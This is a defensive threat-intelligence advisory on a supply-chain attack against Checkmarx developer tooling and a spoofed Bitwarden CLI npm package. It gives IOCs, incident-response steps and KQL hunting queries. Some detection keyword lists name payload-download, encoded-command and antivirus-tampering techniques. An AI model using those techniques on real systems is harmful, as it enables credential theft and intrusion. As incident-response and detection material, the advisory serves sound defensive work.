← Back to Cybersecurity News Center
Severity
CRITICAL
CVSS
9.5
Priority
0.932
×
Tip
Pick your view
Analyst for full detail, Executive for the short version.
Analyst
Executive
Executive Summary
TeamPCP, an active threat actor targeting developer security tooling, has compromised multiple Checkmarx products simultaneously, including Docker images, GitHub Actions workflows, VS Code extensions, and a spoofed npm package, in the third wave of its supply chain campaign. The attack targets the CI/CD pipelines of organizations that use Checkmarx DevSecOps tooling, meaning the very tools deployed to enforce security are being used as the entry point. Any organization running affected Checkmarx components in their software delivery pipeline should treat this as an active compromise until investigation confirms otherwise.
Impact Assessment
CISA KEV Status
Not listed
Threat Severity
CRITICAL
Critical severity — immediate action required
Actor Attribution
HIGH
TeamPCP
TTP Sophistication
HIGH
22 MITRE ATT&CK techniques identified
Detection Difficulty
HIGH
Multiple evasion techniques observed
Target Scope
INFO
Checkmarx KICS Docker images, Checkmarx AST GitHub Action, Checkmarx AST Results VS Code extension, CX Dev Assist VS Code extension, npm ecosystem (@bitwarden/cli impersonation package), AWS SSM, Azure Key Vault, Google Cloud Secret Manager, GitHub Actions CI/CD environments, VS Code, Docker Hub
Are You Exposed?
⚠
Your industry is targeted by TeamPCP → Heightened risk
⚠
You use products/services from Checkmarx KICS Docker images → Assess exposure
⚠
22 attack techniques identified — review your detection coverage for these TTPs
✓
Your EDR/XDR detects the listed IOCs and TTPs → Reduced risk
✓
You have incident response procedures for this threat type → Prepared
Business Context
An attacker who gains execution inside a Checkmarx DevSecOps pipeline operates with the same trust level as your own development team — able to read every secret your build process touches, modify code before it ships, and propagate through every connected repository. The wormable propagation mechanism means a single compromised pipeline can spread to dozens or hundreds of repositories before detection, potentially poisoning software that your customers or internal systems rely on. Organizations in regulated industries face compounded exposure: secrets harvested from cloud vaults may include credentials for production systems handling regulated data, and any downstream code modifications could introduce vulnerabilities into products subject to SOC 2, ISO 27001, or sector-specific compliance requirements.
You Are Affected If
Your CI/CD pipelines reference Checkmarx KICS Docker images pulled from Docker Hub
Your GitHub Actions workflows use the Checkmarx AST GitHub Action
Developers in your organization have the Checkmarx AST Results or CX Dev Assist VS Code extensions installed
Your pipelines include @bitwarden/cli as a dependency, particularly any environment pinned to or auto-resolving to version 2026.4.0
Your CI/CD service accounts have read access to AWS SSM, Azure Key Vault, or Google Cloud Secret Manager and were active during the exposure window
Board Talking Points
Attackers compromised the security scanning tools embedded in our software development process, giving them access to the credentials and code repositories those tools interact with.
We are conducting an immediate audit of all affected pipelines and rotating exposed credentials — this should be treated as a priority incident requiring dedicated response resources this week.
Without containment and remediation, this attack can propagate silently across our entire codebase and cloud environment, potentially resulting in data loss, regulatory breach notification obligations, and compromised software reaching customers.
SOC 2 — CI/CD pipelines and cloud secret stores are in scope for availability, confidentiality, and security trust service criteria; compromise may require incident disclosure to auditors
ISO/IEC 27001 — Secret and credential compromise in cloud key management services directly implicates Annex A controls for cryptographic key management and access control
PCI-DSS — If any harvested AWS SSM, Azure Key Vault, or GCP Secret Manager secrets contain cardholder data environment credentials, a reportable security incident may be triggered under Requirement 12.10
Technical Analysis
TeamPCP's Wave 3 supply chain attack (April 2026) is a multi-vector compromise affecting Checkmarx KICS Docker Hub images, the Checkmarx AST GitHub Action, the Checkmarx AST Results VS Code extension, and the CX Dev Assist VS Code extension.
A spoofed npm package (@bitwarden/cli v2026.4.0) served as an additional vector, impersonating the legitimate Bitwarden CLI used in developer pipelines.
All vectors share a unified C2 infrastructure at audit.checkmarx[.]cx, a typosquatted domain impersonating the legitimate vendor.
Payload behavior maps to the following CWEs: CWE-798 (hardcoded credentials), CWE-506 (embedded malicious code), CWE-829 (inclusion of functionality from untrusted control sphere), CWE-312 (cleartext storage of sensitive information), CWE-494 (download of code without integrity check). Once executed, the payload harvests credentials and secrets from AWS SSM Parameter Store, Azure Key Vault, Google Cloud Secret Manager, GitHub tokens, and local developer workstations (T1552.004 , T1555 , T1552.001 ). The worm component (T1195.001 , T1195.002 ) then injects malicious GitHub Actions workflows into every repository the compromised identity has push access to (T1098 , T1136.003 ), enabling lateral propagation across the victim's entire supply chain. Obfuscation techniques (T1027 ) and defense evasion via disabling security controls (T1562.001 ) are also documented. No CVE identifier has been issued at this time. Patch status: consult official Checkmarx advisories for confirmed clean artifact hashes and remediated versions.
Action Checklist IR ENRICHED
Triage Priority:
IMMEDIATE
Escalate to CISO, legal counsel, and relevant cloud provider security teams immediately if CloudTrail, Azure Monitor, or GCP Audit Logs confirm any 'GetSecretValue', 'GetParameter', or 'SecretManagerGetSecretValue' API calls from CI/CD service accounts during the exposure window, as confirmed secret exfiltration from SSM, Key Vault, or Secret Manager constitutes a credential breach that may trigger regulatory notification obligations (SOC 2, PCI-DSS, GDPR, or state breach notification laws depending on the secrets' scope) — also escalate if any repository receiving push commits from the compromised identity contains production deployment workflows, as this extends the blast radius beyond the CI/CD environment to production systems.
1
Step 1: Containment, Immediately suspend all CI/CD pipeline jobs that reference Checkmarx KICS Docker images, the Checkmarx AST GitHub Action, Checkmarx AST Results VS Code extension, or CX Dev Assist VS Code extension. Block outbound connections to audit.checkmarx[.]cx at perimeter and endpoint DNS. Revoke all GitHub tokens, AWS SSM access keys, Azure Key Vault credentials, and GCP Secret Manager service accounts used in affected pipelines pending rotation.
IR Detail
Containment
NIST 800-61r3 §3.3 — Containment Strategy
NIST IR-4 (Incident Handling)
NIST AC-2 (Account Management)
NIST SC-7 (Boundary Protection)
CIS 4.4 (Implement and Manage a Firewall on Servers)
CIS 6.2 (Establish an Access Revoking Process)
Compensating Control
For teams without enterprise NAC/DNS filtering: push an immediate hosts file entry (0.0.0.0 audit.checkmarx.cx) via Group Policy or Ansible to all CI/CD runner nodes and developer workstations. For GitHub Actions: use the GitHub CLI (`gh secret remove`) to bulk-remove exposed secrets from affected repositories immediately. For AWS SSM keys: run `aws iam list-access-keys --user-name <ci-user>` followed by `aws iam delete-access-key --access-key-id <key>` for each identified key. For Azure: `az ad sp credential reset --id <sp-object-id> --append false` to invalidate all existing credentials on the affected service principal. Document every revocation with a timestamp for the incident timeline.
Preserve Evidence
Before suspending pipelines, export and preserve the full GitHub Actions workflow run logs for all runs that referenced checkmarx/ast-github-action or pulled from Docker Hub under the checkmarx/kics image namespace — these logs contain the exact timestamps and injected step outputs that show whether audit.checkmarx[.]cx was contacted. Capture AWS CloudTrail 'GetParameter' and 'GetSecretValue' events (EventName filter) for the CI/CD IAM role ARNs in the exposure window; these will confirm whether SSM parameters or secrets were exfiltrated. Preserve Azure Monitor activity logs filtered on 'SecretGet' operations from the affected service principal Object ID before credential revocation destroys the attribution chain.
2
Step 2: Detection, Query CI/CD logs and GitHub Actions workflow history for any reference to audit.checkmarx[.]cx or @bitwarden/cli v2026.4.0. Search npm lock files (package-lock.json, yarn.lock) across all repositories for @bitwarden/cli pinned to version 2026.4.0. Review Docker pull history for KICS images pulled from Docker Hub after 2026-04-01. Audit GitHub Actions workflow files for newly injected steps or unexpected uses of secrets contexts. Check cloud provider access logs (AWS CloudTrail, Azure Monitor, GCP Audit Logs) for unexpected SSM, Key Vault, or Secret Manager reads originating from CI/CD service accounts.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2 — Detection and Analysis
NIST SI-4 (System Monitoring)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
NIST AU-2 (Event Logging)
NIST IR-5 (Incident Monitoring)
CIS 8.2 (Collect Audit Logs)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
Compensating Control
Run the following across all cloned repositories to locate the malicious npm package: `grep -r '"@bitwarden/cli"' . --include='package-lock.json' --include='yarn.lock' | grep '2026.4.0'`. For GitHub Actions workflow injection detection, run: `grep -r 'audit\.checkmarx' .github/workflows/ --include='*.yml' --include='*.yaml'` and separately `grep -rE 'secrets\.[A-Z_]+' .github/workflows/` to surface any unexpected secrets context references not present in baseline workflow snapshots. For Docker pull history on Linux CI runners without a SIEM, inspect `/var/lib/docker/containers/*/config.v2.json` and the Docker daemon log at `/var/log/docker.log` or `journalctl -u docker` filtering on 'checkmarx/kics'. Use `git log --all --diff-filter=A -- '.github/workflows/*.yml'` in each repository to enumerate workflow files added during the TeamPCP exposure window.
Preserve Evidence
Capture DNS query logs from all CI/CD runner hosts for resolutions of 'audit.checkmarx.cx' — on Linux runners without a DNS proxy, check systemd-resolved logs via `journalctl -u systemd-resolved | grep audit.checkmarx` or inspect network capture files if tcpdump/Wireshark was running. Pull the complete GitHub Actions artifact log bundles (downloadable as zip via GitHub API: `GET /repos/{owner}/{repo}/actions/runs/{run_id}/logs`) before GitHub's default 90-day log retention expires — these contain the raw stdout of any injected exfiltration step. Preserve the npm package tarball of @bitwarden/cli v2026.4.0 from the npm cache on affected build nodes (typically `~/.npm/_cacache/` or the runner's npm cache directory) for malware analysis and hash comparison against the legitimate Bitwarden package.
3
Step 3: Eradication, Replace all affected Checkmarx artifacts with versions confirmed clean by Checkmarx's official advisory (verify artifact integrity hashes before re-deployment). Remove @bitwarden/cli v2026.4.0 from all dependency manifests and replace with the verified legitimate package from the official Bitwarden registry, confirming the source URL and hash. Audit every repository the compromised identity had push access to; revert any injected workflow files. Remove or disable VS Code extensions pending confirmed clean versions from Checkmarx.
IR Detail
Eradication
NIST 800-61r3 §3.4 — Eradication
NIST SI-2 (Flaw Remediation)
NIST SI-7 (Software, Firmware, and Information Integrity)
NIST CM-3 (Configuration Change Control)
NIST IR-4 (Incident Handling)
CIS 2.2 (Ensure Authorized Software is Currently Supported)
CIS 2.3 (Address Unauthorized Software)
CIS 7.2 (Establish and Maintain a Remediation Process)
Compensating Control
Verify Docker image integrity before re-deployment using `docker inspect --format='{{index .RepoDigests 0}}' checkmarx/kics:<clean-tag>` and compare the SHA256 digest against the hash published in Checkmarx's official advisory. For the npm package replacement, after removing v2026.4.0 from manifests, run `npm install @bitwarden/cli@<verified-version> --registry https://registry.npmjs.org` and immediately run `npm audit signatures` (available in npm v8.1+, free) to validate the package signature against the npm public key. For VS Code extension removal on developer workstations without MDM, distribute a one-liner: `code --uninstall-extension checkmarx.ast-results checkmarx.cx-dev-assist` via a PowerShell/bash script pushed through your configuration management tool or manually executed. Use `git log --author --since=<campaign-start-date> -p -- '.github/workflows/'` on each repository to diff any workflow changes during the exposure window and revert injected steps using `git revert <commit-hash>`.
Preserve Evidence
Before reverting injected workflow files, preserve the malicious workflow YAML content verbatim — capture a `git show <commit-hash>` of each injected commit and store the output as a forensic artifact. This preserves the injected step logic (likely curl/wget to audit.checkmarx[.]cx or an exfil command), the attacker's commit identity, and the timestamp for the incident timeline. Document the file hash (SHA256) of the @bitwarden/cli v2026.4.0 tarball cached on build nodes using `sha256sum ~/.npm/_cacache/content-v2/sha512/<hash-path>` — this hash is needed to confirm whether other packages in the same registry batch were similarly tampered, and may be requested by Checkmarx or law enforcement.
4
Step 4: Recovery, Rotate all secrets that were accessible during the exposure window: GitHub personal access tokens and Actions secrets, AWS IAM credentials with SSM access, Azure service principals with Key Vault access, GCP service accounts with Secret Manager access. Validate artifact integrity checksums against Checkmarx-published hashes before re-enabling pipelines. Re-enable pipelines in a staged manner with enhanced logging. Monitor for anomalous repository commits, unexpected workflow additions, or unusual cloud API calls for a minimum of 30 days post-remediation.
IR Detail
Recovery
NIST 800-61r3 §3.5 — Recovery
NIST IR-4 (Incident Handling)
NIST IA-5 (Authenticator Management)
NIST CP-10 (System Recovery and Reconstitution)
NIST AU-12 (Audit Record Generation)
CIS 5.2 (Use Unique Passwords)
CIS 6.3 (Require MFA for Externally-Exposed Applications)
CIS 7.3 (Perform Automated Operating System Patch Management)
Compensating Control
For secret rotation without a secrets management platform: use the GitHub CLI to rotate Actions secrets programmatically (`gh secret set <SECRET_NAME> --repo <owner/repo> --body <new-value>`), and enumerate all repositories that shared the compromised secret by querying `gh api /repos/{owner}/{repo}/actions/secrets` across your org. For 30-day post-recovery monitoring without a SIEM, configure GitHub repository webhooks to POST `push`, `workflow_run`, and `create` events to a lightweight listener (e.g., a Python Flask app or smee.io proxy) and alert on any `.github/workflows/` file changes or new workflow runs referencing external Docker registries. For AWS CloudTrail without a SIEM, schedule a daily Lambda or `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue` cron job and diff outputs against a post-rotation baseline.
Preserve Evidence
Before re-enabling any pipeline, capture a fresh baseline snapshot of all GitHub Actions workflow files (hash every `.github/workflows/*.yml` file across all repositories using `find . -path '*/.github/workflows/*.yml' -exec sha256sum {} \;`) — this signed baseline is your integrity reference for the 30-day monitoring period. For cloud provider monitoring, establish a baseline of expected `GetParameter`, `GetSecretValue`, and `SecretManagerGetSecretValue` call volumes per CI/CD service account identity from pre-incident CloudTrail/GCP Audit Logs and alert on any deviation above 2x the baseline during the monitoring window, which would indicate a persisted credential being used by TeamPCP infrastructure that survived rotation.
5
Step 5: Post-Incident, This attack succeeded by compromising trusted security tooling, bypassing controls that rely on source trustworthiness. Implement artifact integrity verification (e.g., Sigstore/cosign for container images, npm provenance attestation) across all CI/CD pipelines. Enforce least-privilege for CI/CD service accounts, no pipeline identity should have push access to repositories beyond its defined scope. Add DNS monitoring for typosquatted vendor domains as a standing detection control. Review the MITRE ATT&CK Supply Chain Compromise techniques (T1195.001, T1195.002) against your current control coverage and identify gaps.
IR Detail
Post-Incident
NIST 800-61r3 §4 — Post-Incident Activity
NIST IR-4 (Incident Handling)
NIST IR-8 (Incident Response Plan)
NIST SI-7 (Software, Firmware, and Information Integrity)
NIST SA-12 (Supply Chain Risk Management)
NIST AC-6 (Least Privilege)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
CIS 2.1 (Establish and Maintain a Software Inventory)
Compensating Control
Implement Sigstore/cosign (free, open-source) for container image verification by adding a cosign verify step to every GitHub Actions workflow that pulls a Checkmarx or other security-tooling image: `cosign verify --certificate-identity-regexp '.*checkmarx.*' --certificate-oidc-issuer https://token.actions.githubusercontent.com <image-ref>`. For npm provenance, add `--audit signatures` to all `npm install` steps in CI — this is a built-in npm CLI feature requiring no additional tooling. For DNS typosquatting detection as a standing control, deploy PassiveDNS logging on your perimeter (free via Zeek/Bro or Suricata with the dns.log module) and run weekly `dnstwist checkmarx.com` queries (free tool) to generate a watchlist of likely typosquats, then alert on any CI/CD runner DNS query matching that list. Map T1195.001 (Compromise Software Dependencies and Development Tools) and T1195.002 (Compromise Software Supply Chain) gaps against your pipeline inventory and document findings in the lessons-learned report required by NIST 800-61r3 §4.
Preserve Evidence
For the lessons-learned report, compile the complete attack timeline using GitHub Actions run timestamps, CloudTrail/GCP Audit Log entries, and DNS query logs to establish exactly when each Checkmarx artifact was first pulled post-compromise, how long the exposure window lasted, and which secrets were in scope during that window — this timeline is the evidentiary foundation for any regulatory breach notification assessment and for updating the IR plan per NIST IR-8 (Incident Response Plan).
Recovery Guidance
Before re-enabling any Checkmarx-dependent pipeline, independently verify the SHA256 hash of every replacement artifact (KICS Docker image digest, AST GitHub Action pinned commit SHA, VS Code extension VSIX hash) against values published in Checkmarx's official advisory — do not trust Docker Hub tags alone, as tags are mutable. Re-enable pipelines one at a time in non-production environments first, with enhanced logging capturing every outbound network connection from the runner and every secrets context access, and validate clean operation for at least 72 hours before promoting to production pipelines. Maintain heightened monitoring for anomalous GitHub workflow additions, unexpected cloud secret reads, and DNS lookups to checkmarx-adjacent domains for a minimum of 30 days, as TeamPCP's Shai-Hulud campaign history (Wave 1, Wave 2) demonstrates a pattern of re-entry through residual access after initial remediation.
Key Forensic Artifacts
GitHub Actions workflow run logs (downloadable via GitHub API as zip bundles) for all runs referencing checkmarx/ast-github-action or checkmarx/kics during the TeamPCP exposure window — these contain stdout output of any injected exfiltration step sending data to audit.checkmarx[.]cx, including any base64-encoded secret values captured by the malicious action
DNS query logs from CI/CD runner hosts for resolutions of 'audit.checkmarx.cx' — obtainable from systemd-resolved journals, Zeek dns.log, or perimeter DNS resolver query logs; the presence and timing of these queries establishes the exfiltration window and whether the C2 domain was successfully reached
AWS CloudTrail 'GetParameter' and 'GetSecretValue' events filtered by CI/CD IAM role ARNs during the exposure window — these records confirm whether SSM parameters or Secrets Manager values were read by the compromised pipeline identity and are the primary evidence for cloud credential exfiltration scope
npm cache tarballs of @bitwarden/cli v2026.4.0 preserved from build node npm cache directories (typically ~/.npm/_cacache/ on Linux runners) — the package contents and SHA512 integrity hash confirm the specific malicious payload version and can be submitted to Checkmarx, Bitwarden, and npm security teams for coordinated disclosure and cross-organizational IOC sharing
Git diff output of .github/workflows/ directory changes across all repositories for commits made during the TeamPCP exposure window (via `git log --all --diff-filter=M --diff-filter=A --since=<campaign-start> -- '.github/workflows/'`) — this surfaces injected workflow steps, modified secrets contexts, and any backdoor pipeline additions made using the compromised Checkmarx distribution identity's push access
Detection Guidance
Primary IOC: C2 domain audit.checkmarx[.]cx, block and alert on all DNS queries and outbound HTTP/S connections to this domain across network, endpoint, and CI/CD environments.
Secondary IOC: npm package @bitwarden/cli at version 2026.4.0, scan all package-lock.json, yarn.lock, and pnpm-lock.yaml files across repositories for this exact version string.
Behavioral indicators: unexpected GitHub Actions workflow modifications (new steps added to existing workflows, especially those referencing external actions or secrets); CI/CD service account calls to AWS SSM GetParameter, Azure Key Vault GetSecret, or GCP Secret Manager AccessSecretVersion outside of expected job patterns; new GitHub repository collaborators or deploy keys added following a pipeline run.
Log sources to query: GitHub Actions audit log (workflow_run events, push events on .github/workflows/), AWS CloudTrail (ssm:GetParameter, secretsmanager:GetSecretValue), Azure Monitor (KeyVaultAccessPolicy, SecretGet), GCP Audit Logs (secretmanager.versions.access), Docker Hub pull history, endpoint DNS logs, and npm audit output for affected package versions.
Indicators of Compromise (3)
Export as
Splunk SPL
KQL
Elastic
Copy All (3)
1 domain
2 urls
Type Value Enrichment Context Conf.
⌘ DOMAIN
audit.checkmarx[.]cx
VT
US
C2 infrastructure for TeamPCP Shai-Hulud Wave 3; typosquatted domain impersonating legitimate Checkmarx vendor infrastructure; used across all attack vectors
HIGH
🔗 URL
https://audit.checkmarx[.]cx
VT
US
C2 base URL; block all outbound connections and DNS resolution to this host
HIGH
🔗 URL
npm:@bitwarden/cli@2026.4.0
VT
US
Malicious npm package impersonating the legitimate Bitwarden CLI; version 2026.4.0 is the confirmed malicious release identified in this campaign
HIGH
Platform Playbooks
Microsoft Sentinel / Defender
CrowdStrike Falcon
AWS Security
🔒
Microsoft 365 E3
3 log sources
Basic identity + audit. No endpoint advanced hunting. Defender for Endpoint requires separate P1/P2 license.
🛡
Microsoft 365 E5
18 log sources
Full Defender suite: Endpoint P2, Identity, Office 365 P2, Cloud App Security. Advanced hunting across all workloads.
🔍
E5 + Sentinel
27 log sources
All E5 tables + SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence). Analytics rules, playbooks, workbooks.
IOC Detection Queries (2)
1 domain indicator(s). Detects DNS lookups and connections.
KQL Query Preview
Read-only — detection query only
// Threat: TeamPCP Shai-Hulud Wave 3: Checkmarx Distribution Infrastructure Compromised via
let malicious_domains = dynamic(["audit.checkmarx.cx"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_domains)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
2 URL indicator(s).
KQL Query Preview
Read-only — detection query only
// Threat: TeamPCP Shai-Hulud Wave 3: Checkmarx Distribution Infrastructure Compromised via
let malicious_urls = dynamic(["https://audit.checkmarx.cx", "npm:@bitwarden/cli@2026.4.0"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_urls)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (8)
Sentinel rule: Suspicious PowerShell command line
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where ProcessCommandLine has_any ("-enc", "-nop", "bypass", "hidden", "downloadstring", "invoke-expression", "iex", "frombase64", "new-object net.webclient")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Encoded command execution
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{50,}={0,2}"
or ProcessCommandLine has_any ("-enc ", "-encodedcommand", "frombase64string", "certutil -decode")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName
| sort by Timestamp desc
Sentinel rule: Sign-ins from unusual locations
KQL Query Preview
Read-only — detection query only
SigninLogs
| where TimeGenerated > ago(7d)
| where ResultType == 0
| summarize Locations = make_set(Location), LoginCount = count(), DistinctIPs = dcount(IPAddress) by UserPrincipalName
| where array_length(Locations) > 3 or DistinctIPs > 5
| sort by DistinctIPs desc
Sentinel rule: Persistence via registry / startup
KQL Query Preview
Read-only — detection query only
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where ActionType in ("RegistryValueSet", "RegistryKeyCreated")
| where RegistryKey has_any ("\\CurrentVersion\\Run", "\\CurrentVersion\\RunOnce", "\\Winlogon\\", "\\Services\\")
| where RegistryValueData has_any (".exe", ".dll", ".bat", ".ps1", ".vbs", "cmd", "powershell", "http")
| project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Security tool tampering
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any (
"Set-MpPreference", "DisableRealtimeMonitoring",
"net stop", "sc stop", "sc delete", "taskkill /f",
"Add-MpPreference -ExclusionPath"
)
| where ProcessCommandLine has_any ("defender", "sense", "security", "antivirus", "firewall", "crowdstrike", "sentinel")
| project Timestamp, DeviceName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Suspicious scheduled task creation
KQL Query Preview
Read-only — detection query only
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "schtasks.exe"
| where ProcessCommandLine has "/create"
| where ProcessCommandLine has_any ("/sc minute", "/sc hourly", "powershell", "cmd /c", "http", "\\\\", "frombase64")
| project Timestamp, DeviceName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Unusual C2 communication patterns
KQL Query Preview
Read-only — detection query only
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort in (80, 443, 8080, 8443)
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "outlook.exe", "svchost.exe")
| summarize Connections = count() by DeviceName, RemoteIP, InitiatingProcessFileName
| where Connections > 50
| sort by Connections desc
Sentinel rule: Privilege escalation / account modification
KQL Query Preview
Read-only — detection query only
AuditLogs
| where TimeGenerated > ago(7d)
| where OperationName has_any ("Add member to role", "Add app role assignment", "Add owner to application", "Reset user password")
| extend Target = tostring(TargetResources[0].userPrincipalName), Actor = tostring(InitiatedBy.user.userPrincipalName)
| project TimeGenerated, OperationName, Actor, Target, Result
| sort by TimeGenerated desc
Falcon API IOC Import Payload (1 indicators)
POST to /indicators/entities/iocs/v1 — Weak/benign indicators pre-filtered. Expiration set to 90 days.
Copy JSON
[
{
"type": "domain",
"value": "audit.checkmarx[.]cx",
"source": "SCC Threat Intel",
"description": "C2 infrastructure for TeamPCP Shai-Hulud Wave 3; typosquatted domain impersonating legitimate Checkmarx vendor infrastructure; used across all attack vectors",
"severity": "high",
"action": "detect",
"platforms": [
"windows",
"mac",
"linux"
],
"applied_globally": true,
"expiration": "2026-07-24T00:00:00Z"
}
]
Route 53 DNS — Malicious Domain Resolution
Query Preview
Read-only — detection query only
fields @timestamp, qname, srcaddr, rcode
| filter qname in ["audit.checkmarx[.]cx"]
| sort @timestamp desc
| limit 200
Compliance Framework Mappings
T1059.004
T1555
T1059.007
T1553
T1027
T1552.004
+16
CM-7
SI-3
SI-4
AC-3
SA-9
SR-3
+4
MITRE ATT&CK Mapping
T1555
Credentials from Password Stores
credential-access
T1553
Subvert Trust Controls
defense-evasion
T1027
Obfuscated Files or Information
defense-evasion
T1176
Software Extensions
persistence
T1547
Boot or Logon Autostart Execution
persistence
T1562.001
Disable or Modify Tools
defense-evasion
T1053
Scheduled Task/Job
execution
T1543
Create or Modify System Process
persistence
T1612
Build Image on Host
defense-evasion
T1195.001
Compromise Software Dependencies and Development Tools
initial-access
T1552.001
Credentials In Files
credential-access
T1567.001
Exfiltration to Code Repository
exfiltration
T1567
Exfiltration Over Web Service
exfiltration
T1195.002
Compromise Software Supply Chain
initial-access
T1098
Account Manipulation
persistence
Guidance Disclaimer
